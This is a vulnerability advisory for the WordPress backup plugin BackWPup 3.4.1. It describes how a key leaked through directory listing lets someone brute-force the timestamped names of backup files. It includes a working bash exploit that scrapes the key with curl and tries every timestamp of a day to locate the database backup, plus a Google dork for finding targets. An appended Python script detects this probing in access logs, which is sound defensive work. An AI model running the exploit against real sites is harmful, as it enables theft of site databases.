Title: Vulnerability in WordPress Plugin backwpup v3.4.1: possible brute forcing of backup file download

There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to name the storage directory under wp-content/uploads/, which in most WordPress installations allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, as the rest of the name is just a date and time stamp. It would take a maximum of 86400 tries to find out whether a backup is available for a given day.

Filename format:

backwpup_RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup

I have an exploit available if you're interested.
#!/bin/bash
# Exploit for WordPress Plugin BackWPup v3.4.1
# Download https://wordpress.org/plugins/backwpup
# CWE-552: Files or Directories Accessible to External Parties
# CVE-ID: CVE-2017-2551
# Google Dork: inurl:wp-content/uploads/backwpup
# Add banner about vulnerability

# Pull the random key out of the directory listing of wp-content/uploads/
# (the backup directory is named backwpup-<KEY>-backups).
KEY=$(curl --silent "http://$1/wp-content/uploads/" | html2text | grep backups | awk -F- '{print $2}')
# Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"

# use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0

echo "[+] Scanning website for available backups:"
for y in $(seq -w 0 23); do
    for x in $(seq -w 0 59); do
        # Progress: Z counts guesses made so far out of the 86400 per day.
        Y=$(echo "scale=2;($Z/86400)*100" | bc)
        echo -ne "\r$CWPATH $Y%"
        for z in $(seq -w 0 59); do
            Z=$(( Z + 1 ))
            # Backup number 01 with the default %Y-%m-%d_%H-%i-%s timestamp.
            CWPATH="http://$1/wp-content/uploads/${WPATH}01_${YEAR}-${MONTH}-${DAY}_${y}-${x}-${z}.zip"
            RESULT=$(curl -s --head "$CWPATH" | grep 200)
            if [ -n "$RESULT" ]; then
                echo ""
                echo "[+] Location $CWPATH Found"
                echo "[+] Received $RESULT"
                echo "Downloading......"
                # wget $CWPATH
                exit
            fi
        done
    done
done
echo "Completed."
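As an added example (not part of the advisory or the plugin), the detection logic a site operator could run over web server access logs for the brute-force pattern described above: many requests for backwpup_<KEY><NN>_YYYY-MM-DD_HH-MM-SS.zip names from one client, preceded by a read of the uploads index. The log format, key charset and threshold are assumptions; the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Backup path format from the advisory; the key charset (\w+) is an assumption:
#   backwpup-<KEY>-backups/backwpup_<KEY><NN>_%Y-%m-%d_%H-%i-%s.zip
BACKUP_RE = re.compile(
    r"^/wp-content/uploads/backwpup-(?P<key>\w+)-backups/"
    r"backwpup_(?P=key)\d{2}_\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.zip$"
)
# Apache/Nginx combined-style access log line; only these fields are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def analyse(lines):
    """Per client IP: did it read the uploads index, how many backup filenames
    did it request, and how many of those were actually served (HTTP 200)."""
    stats = defaultdict(lambda: {"listing": False, "probes": 0, "hits": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["path"], m["status"]
        if path == "/wp-content/uploads/" and status == "200":
            stats[ip]["listing"] = True       # directory index was served
        elif BACKUP_RE.match(path):
            stats[ip]["probes"] += 1
            if status == "200":
                stats[ip]["hits"] += 1
    return dict(stats)

def suspicious(stats, threshold=10):
    """IPs with at least `threshold` failed guesses at the timestamped name,
    or that read the index and then downloaded a backup."""
    return sorted(ip for ip, s in stats.items()
                  if s["probes"] - s["hits"] >= threshold or (s["listing"] and s["hits"]))

# Constructed sample log: one client lists uploads/, guesses 12 timestamps
# (404) and then finds the real file; a second client is ordinary traffic.
KEY = "3f9a1c"
SAMPLE_LOG = (
    ['203.0.113.9 - - [07/Sep/2017:10:00:00 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 2145']
    + [f'203.0.113.9 - - [07/Sep/2017:10:00:{i:02d} +0000] "HEAD /wp-content/uploads/backwpup-{KEY}-backups/'
       f'backwpup_{KEY}01_2017-09-07_00-00-{i:02d}.zip HTTP/1.1" 404 -' for i in range(12)]
    + [f'203.0.113.9 - - [07/Sep/2017:10:00:13 +0000] "GET /wp-content/uploads/backwpup-{KEY}-backups/'
       f'backwpup_{KEY}01_2017-09-07_00-00-12.zip HTTP/1.1" 200 5242880',
       '198.51.100.4 - - [07/Sep/2017:10:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3121']
)
```

The precursor signal (a 200 for /wp-content/uploads/) disappears once directory listing is disabled for the uploads tree, which also removes the key leak the advisory describes; the probe counter still catches a client that obtained the key some other way.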